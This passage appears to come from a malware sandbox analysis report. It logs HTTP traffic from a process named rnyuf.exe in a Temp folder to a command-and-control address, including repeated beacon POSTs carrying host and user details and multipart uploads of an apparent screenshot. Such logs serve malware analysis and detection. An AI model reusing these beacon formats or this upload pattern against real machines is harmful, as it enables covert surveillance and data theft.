                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:09.417042971 CEST13858OUTData Raw: 53 15 1b 68 d6 d2 72 8f 8a af ac 47 a9 5c ac e6 68 ad e9 3c 3c df c0 ea 6a ac 9a 25 ca 74 5c 8f 6a b5 5a 0f a8 9a 6b 74 65 d2 d5 97 b0 b8 8f ac 6c 3f 0a 81 a2 71 d5 4d 5a 92 62 19 9a 5a 31 8a 00 aa 10 52 e6 92 81 40 0e 06 9d 9a 65 38 75 a6 48 f0
                                        Data Ascii: ShrG\h<<j%t\jZktel?qMZbZ1R@e8uHjqGTY&1{3IN4,}RZJZJ)h@J(4Q@hQ(Q@Q@SiGZ-QM(R)@8pN"1NWbHJm<MK)#)i8R1E^)hh
                                        Aug 29, 2021 22:28:09.525182009 CEST13917INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        204192.168.2.44994346.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:09.618006945 CEST13918OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:09.692574978 CEST13918INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:09 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        205192.168.2.44994446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:09.971520901 CEST13919OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:09.971620083 CEST13919OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:09.971946955 CEST13929OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:09.972073078 CEST13932OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:10.004002094 CEST13935OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:10.004048109 CEST13938OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:10.004069090 CEST13943OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:28:10.004273891 CEST13953OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:10.004365921 CEST13955OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
                                        Aug 29, 2021 22:28:10.004553080 CEST13958OUTData Raw: c9 6e 8e 78 21 1e b4 a1 71 5b de 5d b3 75 41 49 f6 3b 56 f6 a3 d8 8f eb 2b aa 30 f1 4e 03 35 b2 74 d8 8f dd 62 29 87 4a 3d 9c 7e 22 8f 64 d0 7d 62 06 5e da 70 15 7c e9 92 8e 98 35 1b 58 cc bc ed a3 91 87 b5 8b ea 56 c5 2e 2a 53 6e e3 aa 9a 6f 96
                                        Data Ascii: nx!q[]uAI;V+0N5tb)J=~"d}b^p|5XV.*SnoGo(OhNT7O)UCe*ANO3+<]S<y^G^]*chT)Fc)K|]j}(BK,K\S&Kp+b1Eq1Y
                                        Aug 29, 2021 22:28:10.036284924 CEST13961OUTData Raw: db 47 8e 09 21 7b 57 b9 cb 36 65 79 23 75 7d bf 2b a6 fc 06 c1 c8 ce 46 18 8a ae ba db 9f 11 69 3a c9 b3 20 e9 c9 68 a2 1f 37 fd 67 90 aa 3e f6 38 dd b7 d0 e3 3d e9 c1 d6 be bd ff 00 0d 45 35 47 5b 7f 5b 17 f5 2d 06 da 0f 0a da 6a 96 73 4d 25 d6
                                        Data Ascii: G!{W6ey#u}+Fi: h7g>8=E5G[[-jsM%$ N+8@nf7muxuydTK<& L6G42E#K3jP{;GwR7`+,PPt*NOJ-KV-?3a:X2IM3
                                        Aug 29, 2021 22:28:10.163239002 CEST14028INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        206192.168.2.44994546.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:09.974066973 CEST13932OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:10.073224068 CEST14013INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        207192.168.2.44994646.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:10.275662899 CEST14029OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:10.352323055 CEST14030INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:10.459820032 CEST14030OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:10.459928036 CEST14030OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:10.460299969 CEST14040OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:10.460423946 CEST14043OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:10.492727995 CEST14046OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:10.492774963 CEST14051OUTData Raw: 71 e8 69 3e c7 75 f6 98 6d be cb 3f 9f 38 43 14 5e 59 dd 20 7c 6d da 31 93 9c 8c 63 ae 6b 27 46 32 77 6f 52 d5 59 25 64 8f a0 f5 8f 88 1f 0f 13 c2 5a ed 8e 91 a9 e2 e6 f6 c6 68 51 3c 8b 8f 9d cc 6c 14 65 97 03 96 f6 af 9d 2a 79 ad 2e ad e1 86 69
                                        Data Ascii: qi>um?8C^Y |m1ck'F2woRY%dZhQ<le*y.i)yO$eVM\q$:&"[1I-$"&$1@UFL)QG4Z9)QERRR({sLJQKH(f@w(OxG?+,k4ja'P@9oa
                                        Aug 29, 2021 22:28:10.492789030 CEST14054OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:10.492938042 CEST14056OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:28:10.493155956 CEST14064OUTData Raw: 00 77 35 ca 2f 89 75 a5 bc 9e e7 ed 70 b9 9e 14 82 48 64 b5 89 e0 31 a6 36 a8 84 a9 8c 05 c7 18 5e 39 c7 53 55 6f 75 4d 4b 53 8e e2 3b db b3 2a 5c 5c 0b 99 41 45 1b a4 0b b4 1e 07 40 a7 01 7a 01 d0 0a e5 f6 75 3f af 4b 7f c1 f5 3a 7d a5 36 ef fd
                                        Data Ascii: w5/upHd16^9SUouMKS;*\\AE@zu?K:}6wvrxfEt_-t}NCy0ms;cqBVeq?u4Wv&4,11bsWX&obldP7*\qqUV;cm|#?eR7WX{H^_U`_YiOy
                                        Aug 29, 2021 22:28:10.493177891 CEST14070OUTData Raw: b5 1a 90 b5 c9 78 47 14 e5 4e a2 76 3e 52 ef 5e 95 f0 3d 51 fc 79 2a ba ab 29 b1 93 21 86 47 de 4a f3 5a eb 3e 1e 78 a6 d3 c1 fe 24 7d 4e f2 de 69 e2 36 ef 10 48 b1 92 49 5f 52 38 e0 d7 9d 51 37 06 91 ed 53 69 49 36 7a 94 7e 28 bd be f1 84 70 d8
                                        Data Ascii: xGNv>R^=Qy*)!GJZ>x$}Ni6HI_R8Q7SiI6z~(pI-{d\#8$/exjQUUf 8fg4Rfy^8#TZ#Qu]oIV}+mmkEx[II uH {
                                        Aug 29, 2021 22:28:10.525384903 CEST14073OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:10.629853010 CEST14139INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 30 0d 0a 0d 0a
                                        Data Ascii: 0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        208192.168.2.44994746.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:10.515578032 CEST14070OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:10.593533039 CEST14138INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0


                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        209192.168.2.44994846.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:28:10.819044113 CEST14140OUTPOST /k8FppT/index.php HTTP/1.1
                                        Content-Type: application/x-www-form-urlencoded
                                        Host: 46.17.96.36
                                        Content-Length: 82
                                        Cache-Control: no-cache
                                        Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 31 65 36 38 30 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 30 33 33 38 36 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                        Data Ascii: id=152138533219&vs=2.50&sd=1e680d&os=1&bi=1&ar=1&pc=103386&un=user&dm=&av=13&lv=0
                                        Aug 29, 2021 22:28:10.897176981 CEST14140INHTTP/1.1 200 OK
                                        Server: nginx/1.14.1
                                        Date: Sun, 29 Aug 2021 20:28:10 GMT
                                        Content-Type: text/html; charset=UTF-8
                                        Transfer-Encoding: chunked
                                        Connection: keep-alive
                                        X-Powered-By: PHP/5.6.40
                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                        Data Ascii: 6<c><d>0
                                        Aug 29, 2021 22:28:18.860821009 CEST14140OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----412e85b07ebc931c9305d6d7a5d96d3c
                                        Host: 46.17.96.36
                                        Content-Length: 107128
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:28:18.860914946 CEST14140OUTData Raw: 2d 2d 2d 2d 2d 2d 34 31 32 65 38 35 62 30 37 65 62 63 39 33 31 63 39 33 30 35 64 36 64 37 61 35 64 39 36 64 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------412e85b07ebc931c9305d6d7a5d96d3cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:28:18.861094952 CEST14150OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:28:18.861185074 CEST14153OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:28:18.897800922 CEST14161OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:28:18.897908926 CEST14180OUTData Raw: 24 05 14 62 8c 52 18 62 83 4b 48 69 88 4a 28 a2 90 c4 34 52 d2 e2 80 1b 8a 29 d8 a4 a0 04 14 b4 86 96 80 12 96 93 bd 2f 6a 00 28 a2 8a 00 29 45 27 7a 5e d4 00 51 47 6a 05 31 0b 45 14 50 20 a2 96 8a 60 14 b4 52 53 10 51 45 2d 00 14 b4 51 40 0b 45
                                        Data Ascii: $bRbKHiJ(4R)/j()E'z^QGj1EP `RSQE-Q@E(QE--)(P)ZZJQS4Z(dKIKL)hRP)xQuU3N*%@ip34$S4iSdUA5.6Sbj}+"z*c4Z2c1J.=-.(p
                                        Aug 29, 2021 22:28:18.933065891 CEST14183OUTData Raw: 90 14 6d a2 48 8b 15 03 e6 fb a4 b1 c8 ce 7d c5 72 5a aa b7 e3 f7 af d2 e7 53 74 da 7f 81 62 1f 09 c9 3b ed 1a c6 94 aa f7 26 ce dd dd e5 0b 73 30 00 b2 21 f2 f8 c1 65 05 9b 6a e4 f0 48 e6 8b 3f 05 dd dd 5b da c9 f6 ed 36 09 ee a3 9a 58 6d a6 99
                                        Data Ascii: mH}rZStb;&s0!ejH?[6Xm3,$dtznDmaaw5\#m3c,XTq1J,$+X\[#8b]f7cu?VMK_j0X\[^A5KtP?0O~6\vOn[28
                                        Aug 29, 2021 22:28:18.933173895 CEST14217OUTData Raw: b8 d2 ef de 58 82 ee 31 be 57 e6 50 dc 65 c1 e8 47 6a e5 a7 56 a5 57 cb 08 dd 9b d4 a7 4e 92 e6 9c ac 8f 9f bf b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a 3f b1 f5 3f fa 07 5d ff 00 df 86 ff 00 0a f7 33 e2 1f 03 8e ba 4e a7 f9 8f fe 39 5b fa 35 9f 85
                                        Data Ascii: X1WPeGjVWN?]??]3N9[5u5&0`G^y")%6cZXeVh9:GktFdmvs0~^H xY3.Y]Z*9WAQE(>o&Q\bdg)z{WU
                                        Aug 29, 2021 22:28:18.933358908 CEST14231OUTData Raw: 4a 33 4c 43 85 3a 98 0d 2e 69 8a c4 82 96 98 0d 38 1a ab 93 61 c2 9d 9a 8c 1a 5c d3 b9 36 24 06 97 35 1e 68 cd 3b 8a c4 bb a8 dd 51 6e a3 75 3e 60 e5 26 0d 46 ea 84 1a 70 34 f9 85 ca 4c 1a 8d de f5 0e 69 73 4f 98 5c a4 bb a8 2d 51 66 8d d4 b9 83
                                        Data Ascii: J3LC:.i8a\6$5h;Qnu>`&Fp4LisO\-QfuPK3Q<uqX~hGK3QyPi2hBhWO\*!J)M.j<4`4iiZb$Gp5I(<SZ)A!Z*<6E&ii)NKxL-Rh
                                        Aug 29, 2021 22:28:18.968319893 CEST14242OUTData Raw: 8a 43 1d 9a 33 4d cd 19 a0 2c 3b 34 94 dc d2 66 95 c7 61 e4 d2 66 9b 9a 4c d2 b8 ec 3b 34 66 99 9a 09 a2 e1 61 d9 a0 9a 6e 69 33 4a e3 b0 a6 8a 4c d1 9a 41 61 73 41 34 dc d2 13 45 c7 61 49 a4 cd 37 34 86 a6 e5 58 75 37 bd 19 34 94 0c 53 d6 83 46
                                        Data Ascii: C3M,;4fafL;4fani3JLAasA4EaI74Xu74SFi3H%ZAE.h5isUpi3IIHvI)JQ@i4S+OCK-4Ss<qdzh5YN(;NI?6TiJ\(|*?]SxC&/o'"ld+
                                        Aug 29, 2021 22:28:18.969316006 CEST14247OUTData Raw: 3f 8f af e3 d4 be 16 eb 73 c4 ac ab e5 85 21 ba fd f5 ac 39 71 f4 39 7d aa 76 ba 5a d8 21 88 c2 56 6d 52 95 d9 f2 ed 2d 25 2d 7a 86 61 5d b5 8f c2 4f 1c 6a 5a 7d b5 f5 a6 89 e6 5b 5c c4 b3 44 ff 00 6b 80 6e 46 00 83 82 f9 1c 11 d6 b8 aa fb 1f c3
